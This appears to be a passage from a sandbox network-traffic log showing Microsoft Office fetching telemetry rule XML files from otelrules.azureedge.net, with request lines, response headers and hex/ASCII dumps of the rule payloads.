2024-11-11 00:15:16 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:16 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:16 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: 7766441c-101e-008d-2e5c-2e92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001516Z-15869dbbcc6j87jfhC1DFWr0yc00000005hg00000000d3tu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:16 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	49880	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:16 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:16 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:16 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: dc61a34c-101e-0065-744a-324088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001516Z-15869dbbcc6qwghvhC1DFWssds0000000a7g00000000hd7t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:16 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	49881	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:16 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:16 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:16 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: 4899a4b5-201e-005d-2c62-32afb3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001516Z-15869dbbcc6rnr5chC1DFWwtp4000000020g00000000hnn0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:16 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49882	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:16 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:16 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:16 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 59bb3ce9-601e-0097-63c3-2bf33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001516Z-16547b76f7fp6mhthC1DFWrggn0000000dbg00000000r0x1 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:16 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49883	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:16 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:16 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:16 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 5c96467c-501e-005b-0249-32d7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001516Z-15869dbbcc6ss7fxhC1DFWq6vs00000006v00000000003r6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:16 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49884	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:16 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:17 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:16 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: ee6f9a42-b01e-0098-0758-31cead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001516Z-15869dbbcc6bdtw9hC1DFW9m4s00000005fg0000000072m2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:17 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	49885	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:17 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:17 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:17 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: 269760eb-e01e-0003-4649-320fa8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001517Z-15869dbbcc6vr5dxhC1DFWqn64000000087g000000002ezx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:17 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49886	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:17 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:17 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:17 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: 14de8335-b01e-003e-77d2-2c8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001517Z-16547b76f7fkcrm9hC1DFWxdag0000000dd000000000m2h0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:17 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	49887	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:17 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:17 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:17 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 5f62f0b2-901e-0048-3fce-33b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001517Z-15869dbbcc6ss7fxhC1DFWq6vs00000006sg000000007gdu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-11 00:15:17 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	49888	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:17 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:17 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:17 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: f332610c-701e-0032-1b42-32a540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001517Z-17df447cdb5rnd49hC1DFWgmpw000000042g000000003c7q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:17 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49889	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:17 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:17 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:17 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: 8f5c374f-101e-0046-61d2-2c91b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001517Z-16547b76f7fdtmzhhC1DFW6zhc000000026g00000000fys0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:17 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	49891	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:17 UTC	192	OUT	GET /rules/rule702501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:18 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:17 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7C66E85" x-ms-request-id: a6e5d528-c01e-0079-5e72-30e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001517Z-17df447cdb5zfhrmhC1DFWh33000000009m000000000d00a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
